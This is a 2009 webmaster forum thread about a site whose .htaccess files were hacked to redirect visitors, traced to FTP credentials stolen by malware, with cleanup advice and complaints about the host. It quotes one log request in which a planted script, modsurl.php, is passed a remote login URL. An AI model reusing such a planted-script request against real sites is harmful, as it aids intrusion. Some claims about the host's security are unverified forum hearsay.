You need to speak with your hosting company about their server security problem. Also, make sure that your PHP, forum, blog, and news feed software is updated to the latest version, even if you don't use all of it.

In the meantime, change all of your passwords* immediately. If this does not help, take your site offline and move it to a new hosting company, because if changing passwords doesn't help, it would mean that that hacker has access from inside your hosting company's network.

Also, please do not post domain names or IP addresses here which lead to hacker sites! Always use "example.com" since this domain can never be owned and is therefore safe for use as an example.

* To be clear, go to the 'control panels' for all of the software packages installed on your server, and change the passwords. The hacker may be using the default login password for server software that you do not even use. Your hosting company's support desk will be the best source for help with this problem. If they do not take the problem seriously or cannot help you, then find another host!

Jim

[edited by: jdMorgan at 2:03 pm (utc) on Jan. 27, 2009]

Sorry for writting IP address in public.

Change of password didn't help. Because after change it happens again.

I hosting at ixwebhosting (I heard that they are very good) and I contacted them before 6 hours, stil not answer.

In meantime I spoted one file into my root directory named: modsurl.php
Don't know who and how put that file there but that was at 03.Jan '09 and it is deleted by myself now. I made copy of it on my computer. This script uses curl_init(), curl_exec() etc.

I don't know is this script can change .htaccess or this was other problem.
In http log file have something like /modsurl.php?urlx=http://www.example.com/app/login (.ru)

But I think that if someone get my account password he could delete all my websites etc. not just to add .htaccess and modsurl.php.

Actually, I have two sites with hacked .htaccess but only one have modsurl.php so I think this is something else.

Just wondering how it is possible to change only .htaccess.

Hello,

just to tell, maybe someone help this who get same problem.

Hosting company contacted me and say that one of my computers is infected with Antivirus 2009 which steals data like ftp usernames and passwords which are used to access server and upload .htaccess files. Infected htaccess redirect trafic to website where you get installed on your computer this Antivirus 2009 without knowing that this happening (I have Kaspersky daily updated). And in a circle, looking for new ...

Two points:

First, it does not matter *what* the hacker did to your site. What matters is that *they were able to hack your site*. They could have deleted all your files, but instead of damaging it, they wanted to use it to fool the search engines to get traffic to their own (probably malicious) site. It is good to know that the security breach was not at iX, but in your own PC.

Second, what you have isn't technically a virus, it is probably a key-logger. So don't blame Kaspersky for missing it. Instead, add a few more security programs that protect against more that just viruses. A pretty good program I found recently that can clean up and protect against keyloggers and other malware is "MalWareBytes" -- Try the free version to see if it will remove your problem.

If MalWareBytes does not help, post again. I'll go try to find all the nice free anti-malware programs I have found and used (I have a list *somewhere* on this huge hard drive... :)

Jim

MalwareBytes is the exact tool you need to get Rid of AntiVirus 2009, AntiSpyware 2009 and previous versions going back several years. You'll sometimes need two passes to get rid of it.

Sometimes you'll need to run Spybot Search and Destroy to get rid of the last traces, and if you are really unlucky you'll have to revert a load of changes it made to your HOSTS file too.

I've removed this junk from several dozen machines in the last year, and several of those are used by people who have avoided getting any viruses for a decade. This one is tricky.

Hello,

IX also told me to get "MalWareBytes" and I did it. 12 infections are found on computer where I did ftp access. Yep, this tool is awsome.

I got also ftp log from IX at time of attack and in it I can see one IP address on different times when I was sleeping surely and know that this is not my IP address.

Now, site is clean and I learned a lesson :) and know how .htaccess can be powerfull.

Also I saw folder permisions (I mean root of website) was changed to ... can't remember number but it was allowed access to read/write/execute for owner, group and user. I changed permision back to only read and execute for group and user. Don't know how this happen and how this functioning. When you change permisions of sub-folder is main folder permisions also changed!?

About deleting complete web site I'm not scare because I have always equal copy on my little local server :)

Cheers

Axilos - IXwebhosting is totally lying to you right now. They have had someone hacking their servers for months now, delivering Yahoo java insertion scripts and .htaccess hacks that look exactly like you posted. See this site. It covers your exact problem:
[ixwebhostwarning.wordpress.com...]

This has been going on for months and months. I had to move most of my sites, and it probably explains why the page rank for one site dropped 2 points.

The problem with cleaning the sites is that even after getting them spotless, they would be reinfected in a few days.

This is the fault of IX webhosting, not you.

The good news is they are upgrading everything this week to new levels of security. The bad news is I don't know if I can ever trust them again. See this for the new security update:

[ixwebhostwarning.wordpress.com...]

I'm sad to see that they have STILL not cleared this problem from their servers.

Pathetic.

The PHP upgrade will occur over the next two weeks so maybe that will take care of it. I've had two managers admit to me the problem is their servers, and that over 100,000 sites are effected. I have receive a year of free service as well due to the problem. All my PHP based sites have been moved to a new host, and my main static html site had to be cleaned on every page (yahoo insertion script).

[edited by: Boulder90 at 7:08 pm (utc) on Jan. 31, 2009]